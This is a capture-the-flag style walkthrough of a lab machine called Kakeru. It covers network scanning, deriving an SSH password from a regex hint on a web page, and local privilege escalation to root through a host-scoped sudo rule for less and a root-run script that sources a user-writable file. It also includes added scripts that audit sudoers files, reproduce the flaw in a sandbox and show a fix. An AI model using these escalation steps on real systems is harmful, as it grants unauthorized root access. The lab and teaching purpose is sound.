Group Member's Box - Kakeru


Information Gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:8f:69:69 PCS Systemtechnik GmbH
192.168.31.170 08:00:27:bf:56:1c PCS Systemtechnik GmbH

192.168.31.170 is the target's IP address.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.170 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 02:02 EDT
Nmap scan report for 192.168.31.170
Host is up (0.0026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BF:56:1C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds

Port 80

 <title>User welcome's password is here.</title>

POST /login HTTP/1.1
Host: 192.168.3.132
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.3.132
Connection: keep-alive
Referer: http://192.168.3.132/
Cookie: PHPSESSID=eiag23f4enj5tfcpl7t1qhhk2t
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin


(?<=x-).+(?=en)

That is all the useful information on the page: it reveals a user named welcome, says that this user's password is "here", and gives a regular expression. The natural reading is that the password is whatever the regex matches in the captured request above. The lookbehind `(?<=x-)` anchors just after an `x-`, and the greedy `.+(?=en)` then runs up to the last `en` on that line.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# http http://192.168.31.170|grep -P '(?<=x-).+(?=en)' -o
www-form-url
highlight">(?&lt;=x-).+(?=

The first output line, www-form-url, is the match taken from `application/x-www-form-urlencoded` and is the password. The second line is the regex string itself as it appears in the page's HTML (with `<` entity-encoded as `&lt;`), preceded by the tail of an HTML attribute value that happens to end in `x-`; it also matches because it contains an `en`.

Log in over SSH as welcome with that password.

Privilege Escalation

welcome@Kakeru:~$ ls
sudoers.bak user.txt
welcome@Kakeru:~$ cat sudoers.bak
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
welcome Dashazi=(kakeru) NOPASSWD: /usr/bin/less
kakeru ALL=(ALL:ALL) NOPASSWD: /opt/test.sh
# See sudoers(5) for more information on "@include" directives:

@includedir /etc/sudoers.d

welcome may run /usr/bin/less as kakeru, but only on the host Dashazi. The local hostname is Kakeru, so a plain `sudo -l` does not show this rule; passing `-h Dashazi` makes sudo evaluate the rule for that hostname instead (`sudo -l -h Dashazi` lists it). Once inside less, `!sh` spawns a shell as kakeru:

welcome@Kakeru:~$ sudo -u kakeru -h Dashazi /usr/bin/less --help
!sh
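Host-scoped rules like this one are easy to miss because `sudo -l` only evaluates rules for the local hostname. The script below is an added example, not part of the original write-up: it parses a sudoers file for user specs whose host field is neither `ALL` nor the local hostname and prints the `sudo -h` command line that exercises them. The sample sudoers text is constructed from the sudoers.bak shown above; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: find sudoers rules that are
# scoped to some other host. `sudo -l` only evaluates rules for the local
# hostname, so a rule like "welcome Dashazi=(kakeru) ..." is invisible to it,
# yet `sudo -h Dashazi` still makes sudo evaluate that rule.
set -u

# Emit one tab-separated line per user spec: user, host, runas user, command spec.
# Comments, Defaults, aliases, @include lines and %group rules are skipped.
parse_user_specs() {     # $1 = path to a sudoers file
    awk '
        /^[ \t]*(#|$)/                                  { next }
        /^(Defaults|@include|%|[A-Za-z_]+_Alias)/       { next }
        {
            user = $1
            $1 = ""                      # drop the user field, keep the rest
            rest = $0
            sub(/^[ \t]+/, "", rest)
            eq = index(rest, "=")
            if (eq == 0) next
            host = substr(rest, 1, eq - 1)
            gsub(/[ \t]+$/, "", host)
            spec = substr(rest, eq + 1)
            runas = "root"               # sudoers default when no "(runas)" is given
            if (match(spec, /^\([^)]*\)/)) {
                runas = substr(spec, 2, RLENGTH - 2)
                spec  = substr(spec, RLENGTH + 1)
            }
            sub(/:.*$/, "", runas)       # drop the ":group" half of "(user:group)"
            sub(/^[ \t]+/, "", spec)
            print user "\t" host "\t" runas "\t" spec
        }' "$1"
}

# Rules for user $2 that apply to a host other than $3 (the local hostname),
# printed as the sudo command line that exercises them. Tags such as NOPASSWD:
# are stripped from the command spec.
foreign_host_rules() {   # $1 = sudoers file, $2 = user, $3 = local hostname
    parse_user_specs "$1" | awk -F '\t' -v u="$2" -v me="$3" '
        $1 == u && $2 != "ALL" && $2 != me {
            cmd = $4
            while (sub(/^[A-Z]+:[ \t]*/, "", cmd)) ;
            printf "sudo -h %s -u %s %s\n", $2, $3, cmd
        }'
}

count_user_specs() { parse_user_specs "$1" | awk 'END { print NR }'; }

# Constructed sample: the user-spec lines from the sudoers.bak found on the box.
sample="$(mktemp)"
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
Defaults env_reset
# User privilege specification
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
welcome Dashazi=(kakeru) NOPASSWD: /usr/bin/less
kakeru ALL=(ALL:ALL) NOPASSWD: /opt/test.sh
@includedir /etc/sudoers.d
EOF

foreign_host_rules "$sample" welcome Kakeru   # -> sudo -h Dashazi -u kakeru /usr/bin/less
foreign_host_rules "$sample" kakeru  Kakeru   # -> nothing: its rule is ALL=, so sudo -l already shows it
```

Point it at any readable sudoers copy (backups like sudoers.bak, or files under /etc/sudoers.d) and at the output of `hostname`; every printed line is a candidate that `sudo -l` would have hidden.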
kakeru@Kakeru:/opt$ sudo -l
Matching Defaults entries for kakeru on Kakeru:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kakeru may run the following commands on Kakeru:
(ALL : ALL) NOPASSWD: /opt/test.sh

kakeru can run /opt/test.sh with sudo, but the file itself is not readable. There is also a test.sh in kakeru's home directory, and the two are probably related.

kakeru@Kakeru:/opt$ sudo /opt/test.sh
Please Input: a
/opt/test.sh: line 5: a: command not found

Running it shows that the input is executed as a command (line 5 fails with `a: command not found`); the prompt also appears to accept only a single character. Entering a space instead:

kakeru@Kakeru:/opt$ sudo /opt/test.sh
Please Input:
/opt/test.sh: line 5: /home/kakeru/test.sh: Permission denied

Now the error points at the test.sh in the home directory, which has no execute bit. So line 5 runs /home/kakeru/test.sh with whatever character you typed placed in front of it. Enter `.`, the shell's source command, which reads and executes a file in the current shell without needing the execute bit:

kakeru@Kakeru:~$ sudo /opt/test.sh
Please Input: .
test

/home/kakeru/test.sh was executed (it prints test). Rename the existing test.sh and write a new one that starts a shell:

kakeru@Kakeru:~$ mv test.sh 1
kakeru@Kakeru:~$ echo 'bash -p'>test.sh
kakeru@Kakeru:~$ chmod +x ./test.sh
kakeru@Kakeru:~$ sudo /opt/test.sh
Please Input:
root@Kakeru:/home/kakeru#

Privilege escalation succeeded. Because the file is sourced with `.`, the chmod +x step is not strictly required, as the earlier run of the non-executable original already showed.
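As an added example that is not part of the original write-up, the script below reconstructs what /opt/test.sh appears to do (its source is never shown on the page; the reconstruction is a hypothesis that reproduces the three observed outputs), runs it in a temporary directory as the current user without sudo, performs the same file-replacement trick, and shows a hardened counterpart next to it. All paths, function names and the payload text are my own assumptions; bash is required for `read -n 1`.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up. The real /opt/test.sh source is
# not shown on the page; opt_test.sh below is a hypothetical reconstruction that
# reproduces the three observed outputs. Everything runs in a temp dir as the
# current user (no sudo), so the "privileged shell" is only simulated.
set -u

sandbox="$(mktemp -d)"
trap 'rm -rf "$sandbox"' EXIT
home_script="$sandbox/test.sh"       # stands in for /home/kakeru/test.sh

reset_home_script() {                # the file as found on the box: prints "test", mode 644
    printf 'echo test\n' > "$home_script"
    chmod 644 "$home_script"
}

# Reconstructed /opt/test.sh: one character of input becomes the command word in
# front of a fixed path. "a" -> runs `a`, " " -> execs the file, "." -> sources it.
cat > "$sandbox/opt_test.sh" <<EOF
#!/bin/bash
read -n 1 -p "Please Input: " c
echo
\$c $home_script
EOF

run_with_input() {                   # $1 = single input character; returns the last output line
    printf '%s' "$1" | bash "$sandbox/opt_test.sh" 2>&1 | tail -n 1
}

# The escalation: whatever is in the sourced file runs in the caller's context.
# On the box the payload was `bash -p`; here it only reports which user ran it.
exploit() {
    printf 'echo "payload ran as $(id -un)"\n' > "$home_script"
    run_with_input .
}

# Hardened counterpart: input selects from a fixed menu and is never used as a
# command word; the helper has a fixed path and is run with an explicit interpreter
# (no sourcing, no reliance on the exec bit). On a real box the helper must live in
# a root-owned directory such as /opt, never under a user's home.
printf 'echo helper ran\n' > "$sandbox/helper.sh"
cat > "$sandbox/opt_test_fixed.sh" <<EOF
#!/bin/bash
read -n 1 -p "Please Input: " c
echo
case "\$c" in
    y) /bin/bash "$sandbox/helper.sh" ;;
    *) echo "invalid input" >&2; exit 1 ;;
esac
EOF

run_fixed_with_input() {             # $1 = single input character; returns the last output line
    printf '%s' "$1" | bash "$sandbox/opt_test_fixed.sh" 2>&1 | tail -n 1
}

reset_home_script
run_with_input a        # -> ...: a: command not found
run_with_input ' '      # -> ...: test.sh: Permission denied
run_with_input .        # -> test
exploit                 # -> payload ran as <current user>
run_fixed_with_input .  # -> invalid input
run_fixed_with_input y  # -> helper ran
```

The three observations map onto the reconstruction exactly: an arbitrary character is looked up as a command, a space expands to nothing so the non-executable file is exec'd directly, and `.` sources it into the script's own shell, which under sudo is root's. The fix is not to validate harder on the character but to stop treating input as code and to stop executing anything a less-privileged user can write.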
